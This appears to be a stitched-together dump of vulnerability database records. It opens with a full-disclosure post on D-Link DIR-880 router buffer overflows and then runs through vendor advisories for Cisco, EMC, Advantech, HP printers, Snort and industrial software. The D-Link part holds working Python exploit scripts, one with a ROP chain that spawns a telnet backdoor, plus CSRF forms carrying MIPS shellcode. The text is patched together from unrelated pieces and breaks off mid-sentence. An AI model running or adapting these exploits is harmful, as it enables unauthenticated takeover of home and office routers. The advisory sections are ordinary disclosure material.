Dual-Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. ## Details Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com) . ## Details # Ping buffer oberflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi"> <input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi"> <input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline
var-201702-0423 An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation ISPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of dvp files. The process does not properly validate the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of current process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-201109-0089 Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-September-14 | public | | | | release | +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201810-0396 Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwCLRptw.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
var-201112-0173 The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. HP Printers and HP Digital Senders are prone to a remote code-execution vulnerability. Successfully exploiting this issue allows an attacker to execute arbitrary code with administrative privileges. A successful exploit will result in the complete compromise of affected devices. This BID is being retired. The issue is already documented in BID 50876 (HP Printers and Digital Senders Remote Firmware Update Security Bypass Vulnerability). An attacker may leverage the issue to remotely install malicious printer firmware. The unauthorized firmware could also cause a Denial of Service to the device. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This can be exploited to upload a malicious firmware to device via a specially crafted request to TCP port 9100. PROVIDED AND/OR DISCOVERED BY: Salvatore Stolfo and Ang Cui, Columbia University. ORIGINAL ADVISORY: HPSBPI02728 SSRT100692: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03102449 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices
var-202405-0030 An SQLi vulnerability exists in Delta Electronics DIAEnergie v1.10.1.8610 and prior when CEBC.exe processes a 'RecalculateHDMWYC' message, which is split into 4 fields using the '~' character as the separator. An unauthenticated remote attacker can perform SQLi via the fourth field. Delta Electronics DIAEnergie is an industrial energy management system from Delta Electronics, a Taiwanese company, used to monitor and analyze energy consumption in real time, calculate energy consumption and load characteristics, optimize equipment performance, improve production processes, and maximize energy efficiency. Delta Electronics DIAEnergie v1.10.1.8610 and earlier versions have a SQL injection vulnerability
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products
var-200702-0378 Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-202406-0247 CWE-125: Out-of-bounds Read vulnerability exists that could cause denial of service of the device’s web interface when an attacker sends a specially crafted HTTP request. Schneider Electric SAGE RTUs is a high-performance device for industrial automation and remote monitoring from Schneider Electric, a French company
